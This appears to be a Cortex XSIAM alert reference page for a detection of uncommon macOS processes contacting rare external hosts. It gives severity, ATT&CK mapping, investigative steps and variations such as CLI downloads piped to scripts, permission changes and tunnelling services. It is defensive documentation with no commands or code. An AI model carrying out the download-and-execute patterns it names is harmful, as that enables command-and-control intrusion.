Uncommon macOS process communication to a rare external host

Cortex XSIAM Analytics Alert Reference by Alert name
Product
Cortex XSIAM
Last date published
2026-05-10
Category
Analytics Alert Reference
Index by
Alert name

Synopsis

Activation Period

14 Days

Training Period

30 Days

Test Period

N/A (single event)

Deduplication Period

1 Day

Required Data

  • Requires:
    • XDR Agent

Detection Modules

Detector Tags

Abnormal Communication Analytics

ATT&CK Tactic

Command and Control (TA0011)

ATT&CK Technique

Application Layer Protocol (T1071)

Severity

Informational

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command and control execution, malware download and so on.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.

Variations

Uncommon macOS process communication to a rare external host by security testing tool

Synopsis

ATT&CK Tactic

Command and Control (TA0011)

ATT&CK Technique

Application Layer Protocol (T1071)

Severity

High

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command and control execution, malware download and so on.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.


Uncommon macOS process communication to a rare external host with a frequently abused TLD

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Medium

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command and control execution, malware download and so on.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.


Uncommon macOS process communication to a rare external host while using a CLI utility to establish a connection with a messaging service API

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Medium

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command and control execution, malware download and so on.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.


Uncommon macOS process communication to a rare external host related to LOTTunnels

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command and control execution, malware download and so on.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.


Uncommon macOS process communication to a rare external host with a rare TLD

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command and control execution, malware download and so on.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.


Uncommon macOS process communication to a rare external host while using a CLI utility and piping to script

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command and control execution, malware download and so on.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.


Uncommon macOS process communication to a rare external host while using a CLI utility to download and change permission

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command and control execution, malware download and so on.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.


Uncommon macOS process communication to a rare external host while using a CLI utility running by an unsigned process

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command and control execution, malware download and so on.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.


Uncommon macOS process communication to a rare external host while using a CLI utility and saving data to a temporary folder

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command and control execution, malware download and so on.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.


Uncommon macOS process communication to a rare external host while using a CLI utility and downloading a script

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command and control execution, malware download and so on.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.


Uncommon macOS process communication to a rare external host while using a CLI utility

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command and control execution, malware download and so on.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.